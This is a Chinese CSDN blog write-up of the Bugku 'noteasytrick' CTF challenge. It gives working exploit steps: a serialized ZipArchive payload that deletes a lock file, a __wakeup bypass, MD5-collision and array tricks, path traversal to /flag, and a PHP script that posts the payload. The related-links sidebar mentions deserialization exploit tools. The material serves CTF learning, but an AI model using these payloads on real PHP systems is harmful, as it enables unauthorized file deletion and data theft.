bugkuctf | noteasytrick 反序列化漏洞

已于 2023-03-07 15:25:17 修改
阅读量466 收藏
点赞数 1
分类专栏: ctf php 反序列化漏洞 文章标签: 安全 php web安全
于 2023-02-19 23:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43891732/article/details/129116415
版权
ctf 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
php
2 篇文章 0 订阅
订阅专栏
反序列化漏洞
1 篇文章 0 订阅
订阅专栏

bugku-noteasytrick

分析代码

<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }
    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}
# Jesen 类包含了三个公有属性 $filename、$content 和 $me。当对象被反序列化时,__wakeup 魔术方法会将 $me 属性实例化为一个 Ctf 对象;当对象被销毁时,__destruct 魔术方法会调用 $me 属性的 open 方法。

class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            # 当./sandbox/lock.lock 文件不存在时,将$_POST['b']参数的前30个字符作为文件名,读取对应文件的内容并输出
            # 这条是关键!后面可以利用 file_get_contents 查看文件内容
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }
        #如果 ./sandbox/lock.lock 文件存在,就会使用 $filename 和当前时间的 md5 值拼接出一个新的文件名,并把 $content 写入到这个文件中。最后输出 or you can guess the final filename? 并结束脚本。
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
        echo "right";
    }else{
        echo "false";
    }
}
# 如果 $_POST['a'] 存在,且 $_POST['b'] 不等于 $_POST['a'],且 md5($_POST['b']) 等于 md5($_POST['a']),那么会对 $_POST['c'] 进行反序列化。
思路

两个主要的if判断,两个反序列化会调用的魔法函数: __wakeup() __destruct()

if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a'])))
md5()函数无法处理数组,所以可以用数组绕过

后面需要 b 指定文件,可以用fastcoll_v1.0.0.5 生成两个md5值相同、内容不同的文件

if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
这条说明:先删 ./sandbox/lock.lock ,再构造 b 参数,前30位为文件名(包含路径)

先干掉./sandbox/lock.lock,只有这个文件不存在时,才会执行echo file_get_contents(substr($_POST['b'],0,30)); 再构造b读取文件

访问发现这文件是存在的

locked

可以利用内置类ZipArchive./sandbox/lock.lock

function __wakeup(){
    $this->me = new Ctf();
}
function __destruct() {
    $this->me->open($this->filename,$this->content);
}
__wakeup() 可以用错误的属性数来绕过
__destruct中的open语句和ZipArchive内置类的语句有点相似,可以用来删文件

ZipArchive是php自带zip压缩、解压缩类 ZipArchive 更多参数介绍

$zip = new ZipArchive(); 
$zip->open('test_new.zip', ZipArchive::OVERWRITE)  #参数1是文件,参数2是操作。
    
ZipArchive::open(string $filename [, int $flags ])
第二个参数有:
ZIPARCHIVE::OVERWRITE 预置常量为 8。总是以一个新的压缩包开始,此模式下如果已经存在则会被覆盖。
ZIPARCHIVE::CREATE        如果不存在则创建一个zip压缩包。
ZIPARCHIVE::EXCL	 如果压缩包已经存在,则出错。
ZIPARCHIVE::CHECKCONS	对压缩包执行额外的一致性检查,如果失败则显示错误。   
    
可以利用
$zip = new ZipArchive(); 
$zip->open('./sandbox/lock.lock', ZipArchive::OVERWRITE)
来删除 ./sandbox/lock.lock 文件

操作

第一步:

构造

<?php
class Jesen {
        public $filename;
        public $content;
        public $me;
}
$c = new Jesen();
$c->me = new ZipArchive();
$c->filename = './sandbox/lock.lock';
$c->content = 8; # 这里用 ZipArchive::OVERWRITE 代替,序列化出来就是8,也可以直接用8,这是 ZipArchive::open 中的预置常量
$c1 = serialize($c);
$c1 = str_replace('":3:', '":4:', $c1); # 这一步是设置错误的Jesen属性数,绕过__wakeup
echo $c1;
# O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}

上面序列化的就是构造好的c了,因为这一步只要删了lock.lock就行了,所以ab用数组绕过

a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}

post上传成功删除

成功删除

第二步:

利用fastcoll工具生成符合“内容不同、md5值相同”条件的两个文件

fastcoll_v1.0.0.5.exe 1.txt
或
fastcoll_v1.0.0.5.exe -p 1.txt -o 2.txt 3.txt
生成的两个文件前面内容是一样的,后面不同

fastcoll官网

根据题目给的提示 flag在/flag ,和代码中的 substr($_POST['b'],0,30),可以构造:

./../../../../../../../../flag 刚好30位

生成两个文件 1_msg1.txt1_msg2.txt

getflag
<?php
$postdata = http_build_query(
    array(
        'a' => file_get_contents("1_msg1.txt"),
        'b' => file_get_contents("1_msg2.txt"),
        'c' => "O:5:\"Jesen\":3:{s:8:\"filename\";N;s:7:\"content\";N;s:2:\"me\";N;}"
    )
);
$opts = array('http' =>
              array(
                  'method' => 'POST',
                  'header' => 'Content-type: application/x-www-form-urlencoded',
                  'content' => $postdata
              )
);
$context = stream_context_create($opts);
$result = file_get_contents('http://114.67.175.224:18647/', false, $context);
echo $result;
?>

getflag

bugku_noteasytrick
weixin_50076644的博客
07-29 606
bugku_web_noteasytrick
php 反序列化 ctf,Bugku CTF 反序列化
weixin_39693971的博客
03-27 639
反序列化php反序列化漏洞又称对象注入,可能会导致远程代码执行(RCE)个人理解漏洞为执行unserialize函数,调用某一类并执行魔术方法(magic method),之后可以执行类中函数,产生安全问题。所以漏洞的前提:1)unserialize()函数变量可控2)存在可利用的类,类中有魔术方法右键查看源码image.png构造读出hint.phpimage.png解码base64class ...
Bugku WEB noteasytrick
qq_41696858的博客
07-30 564
首先感谢大佬的文章,我是一直卡在如何删除lock文件,先放传送门: https://blog.csdn.net/qq_53460654/article/details/116798346 这题的主要考点数ZipArchive类用open方法删除文件和fastcoll工具的运用 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content
Bugku noteasytrick
明裕学长的博客
05-09 467
打开环境 <?php error_reporting(0); ini_set("display_errors","Off"); class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __destruct() { $this->me
【BUUCTF】basic web BUU CODE REVIEW 1 1(反序列化漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3389
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
bugku web-安慰奖-考查反序列化和魔术方法
weixin_46578840的博客
09-04 346
打开网址发现一片空白 审查源代码发现一串base,解码得到备份 打开查看发现源代码, <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
fastcoll伪造MD5值
10-31
MD5是目前最热门的加密算法,我们通常用MD5值来验证文件的完整性。例如在一些比较正规的下载网站,通常会提供软件的MD5值,这样我们就可以对下载回来的文件用MD5校检软件(如HashX等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。但当两个不同文件的MD5值完全一样时,你还会信任MD5吗? 找出破解MD5加密方法的专家是我国山东大学的王小云教授,这则新闻在以前的软件版块曾详细报道过。但之后MD5的破解一直没有进展,直到最近,国外的科学家研究出了新的MD5碰撞破解方法,可以让两个不同文件的MD5值完全一样,而之前我们一直认为一个文件的MD5值在世界上是独一无二的,这就像一个人克隆了你的指纹然后冒充你一样恐怖! 为了验证MD5值的独一无二性,我们来做一个简单的试验: 在桌面上新建一个文本文档,文件名为“test.txt”,内容为“OfficeBa”。然后将这个文本文档拖动到校验工具HashX中,点击左上角的“Hash File”按钮,得到其MD5值为051cb2917a5b70505e1687dee449c765,然后为文档中的“OfficeBa”加上双引号,保存后再通过HashX进行校检,发现MD5值变成了9ab117400993b70bc9945a9b15749d5d了。可见,一个极细微的变动都会导致文件的MD5值不同! 那么我们能让两个程序文件的MD5一致,却又都能正常运行,并且可以做完全不同的事情么?答案是:“可以!”。要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成我们同样以刚才的test.txt来做试验: -h [--help] 显示选项 -q [--quiet] 简化 -i [-ihv] arg 使用指定的初始值,默认是md5初始值 -p [-prefixfile] arg 使用给定的前缀计算初始值,仍然把数据复制到输出文件中(必须是个文件名) -o [--out] arg 指定输出文件名,此选项必须是最后一个参数,而且两个文件名必须同时指定 默认的是 -o msg1.bin msg2.bin 把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验他们的MD5值,可以发现是完全一样的,但是在HashX中用“SHA-1”加密算法进行校验的时候,结果竟然是不同的(SHA-1加密算法生成的结果也是独一无二的)!可见这已经是完全不同的两个文件,但是他们的MD5值竟然完全相同。 如果黑客从网上下载一个工具,给其捆绑上木马,然后通过工具让其MD5值和原文件一样。那么当用户下载了文件后用MD5校验工具进行校验时就会发现带毒文件和原文件MD5值完全一样,就会放心地去运行,结果可想而知。所以,MD5加密已经不再可信!
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
【MySQL JDBC 反序列化漏洞分析】 MySQL JDBC 反序列化漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
追洞小组 | Jdbc反序列化漏洞复现浅析
Ms08067安全实验室
05-10 639
文章来源|MS08067 WEB攻防知识星球本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组目录1、前言+靶场搭建2、漏洞复现3、漏洞分析4、漏...
ctf题php反序列化,BugkuCTF flag.php(反序列化)
weixin_27875131的博客
03-25 765
进去后是个登录页面,但是login根本不会跳转,看源码也没提示,但是这道题给了一个提示:hint,那么盲猜应该是一个get参数,因为post不能跳转,那么get总有内容吧,跟上hint参数,随便赋一个值。发现报出了源码审计一波发现只要cookie的值等于$key变量的序列化字符就能输出flag。那么发现之前没有给$key定义赋值,但是最下面出现了,我们先在本机上查看这种情况下的$key变量的序列化...
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
qq_58869808的博客
07-26 1708
反序列号漏洞学习!BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz
BUUCTF—php反序列化
yzl_007的博客
10-23 992
BUUCTF—php反序列化 [极客大挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
CTF-反序列化
qq_61774705的博客
08-15 4623
反序列化
php反序列化复现——bugku 点login没反应
(∪.∪ )...zzz的博客
06-06 340
如题所示, 点login没反应 查看源代码 提交的时候要注意要把提示的参数去掉啊
ctf系列——反序列化漏洞
超级无敌菜阿板的博客
05-26 4711
题目 http://123.206.87.240:8006/test1/ 拿到题之后先看源码 you are not the number of bugku ! <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&a...
Fastjson反序列化漏洞深度解析及EXP汇总
然而,随着版本的更新,该库也暴露出了一些安全漏洞,特别是反序列化漏洞。Fastjson 版本中就存在这类漏洞,这一问题已成为安全研究者和攻击者关注的焦点。攻击者利用这些漏洞,可能会执行不安全的代码,造成数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值